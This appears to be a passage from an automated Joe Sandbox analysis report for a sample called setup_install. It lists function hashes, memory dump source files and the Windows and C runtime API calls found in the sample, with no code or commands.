                                        • Instruction ID: 3e41bfe068caff70c4444e662433289ec3c500ed13d1b6afacb3f86feaff3243
                                        • Opcode Fuzzy Hash: e1b454954f011bf638e07815149d10a180966277ffa989e0d39ae9ac3ad8adfd
                                        • Instruction Fuzzy Hash: 62014C329002040BE7507E19A54129FF7A5EB92724F84486EE9845B303E33E982AC7EA
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 36f3f04fe1d12fa44ebd73b7f362a408acc74720ee7858ca663716c2d4fa6c93
                                        • Instruction ID: 9813208040df8bcabd5ecd93adb422209a570d46651a8cebc58c75970641085f
                                        • Opcode Fuzzy Hash: 36f3f04fe1d12fa44ebd73b7f362a408acc74720ee7858ca663716c2d4fa6c93
                                        • Instruction Fuzzy Hash: B86171B1E043489BDF20DFB8D4816AEBBF1BF05354F04452AE8959B381E338A946CB56
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b32e9b2d8af7d58c73b4337b58c7b6d077bafe52f7be672a696f0d24f5a564ef
                                        • Instruction ID: 97a835f0bab8566fcea2399f8891b3b6e811d4d7b0bef094e2c228698b8bf68c
                                        • Opcode Fuzzy Hash: b32e9b2d8af7d58c73b4337b58c7b6d077bafe52f7be672a696f0d24f5a564ef
                                        • Instruction Fuzzy Hash: 654107B0A09301AFD314AF29C98051BFBE1ABD9314F54C96EF4C897305D7B8D8849B9A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ec10444c9c9367a1568dc79920970659b255b9fc3430bb36bf4a667d1b76d1ea
                                        • Instruction ID: 6d49ab758d8a78875b3209e0e7e3dd0642eb52fbe61511bb295715b998927df5
                                        • Opcode Fuzzy Hash: ec10444c9c9367a1568dc79920970659b255b9fc3430bb36bf4a667d1b76d1ea
                                        • Instruction Fuzzy Hash: CB31A5B0A012008FDB14AF79C4C535ABBE0BF45308F14C5AEE9498F366D739D899C79A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed14744252aaa5189a1227035c308eecd109a6e68c410b94f4975ce7d95969fb
                                        • Instruction ID: 86d2ba720ac024f27848802e215260e41f1637f53b7faa15b025aa9003ee4b34
                                        • Opcode Fuzzy Hash: ed14744252aaa5189a1227035c308eecd109a6e68c410b94f4975ce7d95969fb
                                        • Instruction Fuzzy Hash: C9311AB0A093019FD3149F29C99061BFBE1EBD9314F54DA2EF4C897305D278D8849B96
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2572fc53e25e4f74657896a4b57e44218f771df4588937c373912bc0b81d2fba
                                        • Instruction ID: 6b60ca081e06cd0dcbf1699e33de999fa7ff62b75779f0c85c711811b9691e1b
                                        • Opcode Fuzzy Hash: 2572fc53e25e4f74657896a4b57e44218f771df4588937c373912bc0b81d2fba
                                        • Instruction Fuzzy Hash: 26319270A042008FDB04EF79C5C565ABBE1AF45308F1485AEEC594F3A6C739D859CB9A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 311c90d356c501811193d737de7da2a983b3d925117fcab7caea35c69de224c7
                                        • Instruction ID: 138828c3db26f787b0258c9a6b65fdec578152428ab12bde3a006059b5f41324
                                        • Opcode Fuzzy Hash: 311c90d356c501811193d737de7da2a983b3d925117fcab7caea35c69de224c7
                                        • Instruction Fuzzy Hash: F1317C70A053058FCB14AFA9C48575ABFE0BF05328F10856EE9504B392C779E948CBE6
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 311c90d356c501811193d737de7da2a983b3d925117fcab7caea35c69de224c7
                                        • Instruction ID: 1f20f23e49af853d88e6419f37278b77ef579f69dce4054c3f44f815fad12d27
                                        • Opcode Fuzzy Hash: 311c90d356c501811193d737de7da2a983b3d925117fcab7caea35c69de224c7
                                        • Instruction Fuzzy Hash: 5B317CB0A053058FCB14AFA9C48579AFFE0BF05328F10856EE9544B392C779E944CBE6
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID:
                                        • API String ID: 2221118986-0
                                        • Opcode ID: bcdf8a441313d2bf67dcefe7163a48c9d2dd6d3fd3f89e105a5e8ee2a8419380
                                        • Instruction ID: 2fd4a2c8e0bae650d701efdd0f5ff6b7ade0c864e4419e96ebdbdab257f85aaa
                                        • Opcode Fuzzy Hash: bcdf8a441313d2bf67dcefe7163a48c9d2dd6d3fd3f89e105a5e8ee2a8419380
                                        • Instruction Fuzzy Hash: 9A3192B49043199FCB00DF69D48169EBBF5BB88354F00892EE858A7341E738D9448F95
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 408d583c8d6ab92758066e532e2d5cbb58883b4fa8d39abdb835644ed5189e22
                                        • Instruction ID: 0b6e0dffd9293ca98acec9f48a4a1a94bc15df0215d3dd4cd36eba00ff1b97a5
                                        • Opcode Fuzzy Hash: 408d583c8d6ab92758066e532e2d5cbb58883b4fa8d39abdb835644ed5189e22
                                        • Instruction Fuzzy Hash: 15216F70A042009FCB14FF79C5C569ABFE1AF05348F0085AEE9854B366D779D944CB96
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1074d728a702dd99ef3f4c8f50a5b67c749093a2e8047ff75630de9897c1d13
                                        • Instruction ID: f63344d4215dfd62ae23d7a37a87f984b8b9488a415ef99cd404c2738710182e
                                        • Opcode Fuzzy Hash: e1074d728a702dd99ef3f4c8f50a5b67c749093a2e8047ff75630de9897c1d13
                                        • Instruction Fuzzy Hash: 3111C2316042119BDB00BE19D98096FF7E9FBD9358F040E6FE884A7301E774E8128BDA
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: mallocstrerrorstrlen
                                        • String ID:
                                        • API String ID: 993191051-0
                                        • Opcode ID: ef7b87638a1bbbe68ef1f846eaed84aae83c0fde87b0597b4833e13b1acb7d85
                                        • Instruction ID: d661d0c154e99ca312f3a3f9383df3eb2f2185d1ef63dc9c4af59cc7c769369a
                                        • Opcode Fuzzy Hash: ef7b87638a1bbbe68ef1f846eaed84aae83c0fde87b0597b4833e13b1acb7d85
                                        • Instruction Fuzzy Hash: 8F11FBB08187149BCF107F6AC48546EBFF5AE52348F45C83EE4C96B212D77C94858BDA
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 84bf33c1fbf4d1563d14f52e51cd1051c2a068922ff74a5f6d9ce7b83a7a84ca
                                        • Instruction ID: 78fcb0fe7c5a5b47a3e0f62c41d166303783e6cd5baacf020f6a147cb23d0802
                                        • Opcode Fuzzy Hash: 84bf33c1fbf4d1563d14f52e51cd1051c2a068922ff74a5f6d9ce7b83a7a84ca
                                        • Instruction Fuzzy Hash: D10109B04586118BCF10BF66C48142EBEF2AE52348F419C7EE1C527252D77C9485CBDE
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0a430a732bed3831dbee5720d36ab6ee648f6cc8d298d42221e3ddd0c6baaecd
                                        • Instruction ID: 70b345a367f61e2cc505c6828a18019723ab25148ff624561a56d965b51c77f6
                                        • Opcode Fuzzy Hash: 0a430a732bed3831dbee5720d36ab6ee648f6cc8d298d42221e3ddd0c6baaecd
                                        • Instruction Fuzzy Hash: EB01D3B08186018ACF10BF66C48142EBEF2AE52348F51987EE1856B212D77C98858B9E
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2bb8122c11225249702b1f1eeabfe051ab89a0e5e50b75ea1070e1f31c22bffa
                                        • Instruction ID: 667bbbd54f9e1fa958ba811afd346c4de76c95434dbddba3e9882f232aef63a0
                                        • Opcode Fuzzy Hash: 2bb8122c11225249702b1f1eeabfe051ab89a0e5e50b75ea1070e1f31c22bffa
                                        • Instruction Fuzzy Hash: 2E017CB0A082109FC704EF2DC18451AFBE5FBD9308F50C8AEE0889B315E7759945CB96
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9dc40bc6eefcd07be14acdec06e5cb669f690b85e8162c132b8c64cc987e486b
                                        • Instruction ID: 229ea5a61a7def4534e5701ce02f15af018db38cb8c2bf21966133556898d559
                                        • Opcode Fuzzy Hash: 9dc40bc6eefcd07be14acdec06e5cb669f690b85e8162c132b8c64cc987e486b
                                        • Instruction Fuzzy Hash: 8401D6B08186018BCF10BF65C48146EBFF2AE52348F51D83EE0C56B212D77C9485CB9E
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        APIs
                                        Strings
                                        • -, xrefs: 0041F181
                                        • not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 0041F009
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: fwrite$abortfputsfreememcpy$strlen
                                        • String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/):
                                        • API String ID: 4144276882-2342464244
                                        APIs
                                        • calloc.MSVCRT ref: 64941E3A
                                        • CreateSemaphoreA.KERNEL32 ref: 64941E8E
                                        • CreateSemaphoreA.KERNEL32 ref: 64941EB5
                                        • InitializeCriticalSection.KERNEL32 ref: 64941ED4
                                        • InitializeCriticalSection.KERNEL32 ref: 64941EDF
                                        • InitializeCriticalSection.KERNEL32 ref: 64941EEA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalInitializeSection$CreateSemaphore$calloc
                                        • String ID: l
                                        • API String ID: 2075313795-2517025534
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: EventSleepThread$CloseCreateHandlePriorityResetResume_beginthreadex
                                        • String ID:
                                        • API String ID: 3227561178-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        APIs
                                        • TryEnterCriticalSection.KERNEL32 ref: 649423A1
                                        • LeaveCriticalSection.KERNEL32 ref: 649423E6
                                          • Part of subcall function 649422A0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,-0000001E,-0000000A,00000016,?,64942587), ref: 649422DF
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Leave$Enter
                                        • String ID:
                                        • API String ID: 2978645861-0
                                        APIs
                                        • pthread_once.LIBWINPTHREAD-1 ref: 0049703F
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 0049704C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_mutex_lockpthread_once
                                        • String ID: `pJ
                                        • API String ID: 1659557605-245416778
                                        APIs
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443A0
                                          • Part of subcall function 64944360: Sleep.KERNEL32(?,?,?,?,?,?,64943273,?,?,?,?,649433EF,00000000,64944CE0), ref: 649443D9
                                        • fprintf.MSVCRT ref: 6494165D
                                        • exit.MSVCRT ref: 64941669
                                          • Part of subcall function 649442C0: Sleep.KERNEL32(?,?,?,?,?,?,649432B2,?,?,?,?,649433EF,00000000,64944CE0), ref: 649442F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1969677316.0000000064941000.00000020.00000001.01000000.00000007.sdmp, Offset: 64940000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: Sleep$exitfprintf
